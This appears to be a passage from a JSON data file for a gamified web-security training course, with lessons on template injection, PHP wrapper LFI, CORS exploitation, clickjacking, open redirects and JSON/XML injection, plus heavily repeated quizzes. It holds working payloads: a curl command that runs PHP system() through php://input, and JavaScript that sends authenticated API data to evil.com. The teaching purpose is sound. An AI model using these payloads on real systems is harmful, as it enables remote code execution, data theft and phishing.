firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-ssti-detection","cat":"Web Application","title":"Template Injection Detection","diff":2,"xp":150,"intro":"Identify which template engine is vulnerable.","sections":[{"type":"text","content":"Inject mathematical expressions in different template syntaxes. The one that evaluates reveals the engine."},{"type":"code","lang":"bash","content":"# Test payloads:\n{{7*7}}      # Jinja2, Twig -> 49\n${7*7}       # Freemarker -> 49\n#{7*7}       # Ruby ERB -> 49\n{{7*'7'}}    # Jinja2 -> 7777777, Twig -> 49\n<%= 7*7 %>   # ERB -> 49"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"{{7*'7'}} returning '7777777' identifies...","opts":["Twig","Jinja2","Freemarker","ERB"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-lfi-wrappers","cat":"Web Application","title":"PHP Wrapper LFI Attacks","diff":3,"xp":200,"intro":"Use PHP wrappers to read source code and execute commands via LFI.","sections":[{"type":"text","content":"PHP stream wrappers: php://filter reads files as base64 (bypasses PHP execution), php://input injects POST data as code, data:// embeds code inline."},{"type":"code","lang":"bash","content":"# Read source code as base64\n?file=php://filter/convert.base64-encode/resource=config.php\n# Execute code via POST body\ncurl -X POST 'http://target.com/?file=php://input' -d '<?php system(\"id\"); ?>'\n# data:// wrapper\n?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJpZCIpOyA/Pg=="},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"php://filter is useful because...","opts":["It uploads files","It reads PHP source code without executing it","It deletes files","It modifies config"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-cors-exploit","cat":"Web Application","title":"CORS Misconfiguration Exploitation","diff":2,"xp":150,"intro":"Steal data cross-origin when CORS is misconfigured.","sections":[{"type":"text","content":"If the server reflects any Origin with credentials allowed, any website can steal authenticated data from the API."},{"type":"code","lang":"javascript","content":"// From attacker page:\nvar xhr = new XMLHttpRequest();\nxhr.open('GET', 'https://api.target.com/user/data', true);\nxhr.withCredentials = true;\nxhr.onload = function() {\n  fetch('https://evil.com/steal?d=' + btoa(xhr.responseText));\n};\nxhr.send();"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Dangerous CORS reflects...","opts":["No origin","Any Origin with Access-Control-Allow-Credentials: true","Only trusted origins","The Referer header"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-clickjacking-advanced","cat":"Web Application","title":"Advanced Clickjacking Techniques","diff":2,"xp":150,"intro":"Multi-step clickjacking to perform complex actions.","sections":[{"type":"text","content":"Chain multiple clicks by moving the invisible iframe between each click, guiding the victim through a multi-step process like changing settings."},{"type":"code","lang":"html","content":"<style>\niframe { opacity: 0; position: absolute; z-index: 2; }\n.btn { position: relative; z-index: 1; }\n</style>\n<button class='btn'>Click to Win!</button>\n<iframe src='https://target.com/settings'></iframe>\n<script>\n// Move iframe position between clicks\n// Click 1: navigate to settings\n// Click 2: change email\n// Click 3: confirm\n</script>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Clickjacking is prevented by...","opts":["CSRF tokens alone","X-Frame-Options / CSP frame-ancestors","Input validation","Encryption"],"ans":1},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-insecure-redirect","cat":"Web Application","title":"Open Redirect to Phishing","diff":1,"xp":75,"intro":"Abuse trusted URLs for convincing phishing.","sections":[{"type":"text","content":"An open redirect on a trusted domain makes phishing URLs look legitimate: https://trusted.com/redirect?url=https://evil.com/login."},{"type":"code","lang":"bash","content":"https://target.com/redirect?url=https://evil.com\nhttps://target.com/redirect?url=//evil.com\nhttps://target.com/redirect?next=https://evil.com/phish"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Open redirects are dangerous because...","opts":["They crash servers","The phishing URL appears to come from a trusted domain","They bypass HTTPS","They modify DNS"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-json-injection","cat":"Web Application","title":"JSON Injection Attacks","diff":2,"xp":150,"intro":"Inject into JSON structures to modify data or bypass logic.","sections":[{"type":"text","content":"When user input is concatenated into JSON without proper escaping, inject additional fields or modify existing values."},{"type":"code","lang":"bash","content":"# Username field concatenated into JSON:\n# {\"user\":\"USER_INPUT\",\"role\":\"user\"}\n# Inject: admin\",\"role\":\"admin\n# Result: {\"user\":\"admin\",\"role\":\"admin\",\"role\":\"user\"}\n# Many parsers use the LAST occurrence"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"JSON injection exploits...","opts":["SQL queries","Improper escaping when building JSON from user input","Binary data","XML parsing"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-parameter-tampering","cat":"Web Application","title":"Parameter Tampering","diff":1,"xp":75,"intro":"Modify hidden form fields, cookies, and URL parameters.","sections":[{"type":"text","content":"Client-side validation is useless. Change hidden form fields, modify cookie values, and manipulate URL parameters directly."},{"type":"code","lang":"bash","content":"# Hidden field: <input type='hidden' name='price' value='99.99'>\n# Change to: price=0.01\n# Cookie: role=user -> role=admin\n# URL: ?discount=0 -> ?discount=100\ncurl -d 'price=0.01&item=premium' https://target.com/purchase"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Client-side validation is...","opts":["Sufficient security","Easily bypassed (always validate server-side)","The only validation needed","Secure"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-xml-injection","cat":"Web Application","title":"XML Injection","diff":2,"xp":150,"intro":"Inject into XML documents to modify structure and logic.","sections":[{"type":"text","content":"When user input is embedded in XML, inject closing tags, new elements, or CDATA sections to alter the document's meaning."},{"type":"code","lang":"xml","content":"<!-- Input in username field -->\n<!-- Injecting: admin</user><role>admin</role><user>x -->\n<request>\n  <user>admin</user>\n  <role>admin</role>\n  <user>x</user>\n  <role>user</role>\n</request>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"XML injection differs from XXE by...","opts":["Nothing","Modifying XML structure vs loading external entities","Using different tags","Being harder"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database 